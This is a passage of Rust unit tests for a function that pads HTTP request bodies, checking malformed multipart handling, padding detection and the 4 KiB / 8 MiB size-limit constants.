864    fn pad_multipart_body_not_starting_with_boundary_is_skipped() {
865        // A multipart body that doesn't start with --<boundary> is malformed.
866        // pad_multipart must return SkippedOpaque rather than corrupting it.
867        let boundary = "abc123";
868        let malformed_body = b"this body does not start with the boundary";
869        let ct = format!("multipart/form-data; boundary={boundary}");
870        let out = pad(malformed_body, &ct, 16 * 1024);
871        assert_eq!(
872            out,
873            PadOutcome::SkippedOpaque,
874            "malformed multipart (body missing leading boundary) must be SkippedOpaque"
875        );
876    }
877
878    // ── looks_padded for multipart ────────────────────────────────────────
879
880    #[test]
881    fn looks_padded_detects_multipart_shape() {
882        let boundary = "fence42";
883        let body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
884        let ct = format!("multipart/form-data; boundary={boundary}");
885        let out = pad(body.as_bytes(), &ct, 8 * 1024);
886        if let PadOutcome::Padded { bytes, .. } = out {
887            assert!(
888                looks_padded(&bytes),
889                "looks_padded must detect multipart padding"
890            );
891        }
892    }
893
894    // ── MIN_USEFUL_PAD / MAX_USEFUL_PAD constant anti-rig ─────────────────
895
896    #[test]
897    fn min_useful_pad_is_4_kib() {
898        assert_eq!(MIN_USEFUL_PAD, 4 * 1024, "MIN_USEFUL_PAD must be 4 KiB");
899    }
900
901    #[test]
902    fn max_useful_pad_is_8_mib() {
903        assert_eq!(
904            MAX_USEFUL_PAD,
905            8 * 1024 * 1024,
906            "MAX_USEFUL_PAD must be 8 MiB"
907        );
908    }
909
910    #[test]
911    fn pad_at_exactly_min_useful_pad_produces_padded() {
912        // requested_bytes == MIN_USEFUL_PAD should NOT be SkippedTooSmall
913        // (the guard is `< MIN_USEFUL_PAD`, not `<=`).
914        let out = pad(b"", "application/json", MIN_USEFUL_PAD);
915        assert!(
916            matches!(out, PadOutcome::Padded { .. }),
917            "exactly MIN_USEFUL_PAD must produce Padded, not SkippedTooSmall"
918        );
919    }
920
921    #[test]
922    fn pad_one_below_min_useful_pad_is_too_small() {
923        let out = pad(b"", "application/json", MIN_USEFUL_PAD - 1);
924        assert_eq!(
925            out,
926            PadOutcome::SkippedTooSmall,
927            "one byte below MIN_USEFUL_PAD must be SkippedTooSmall"
928        );
929    }
930}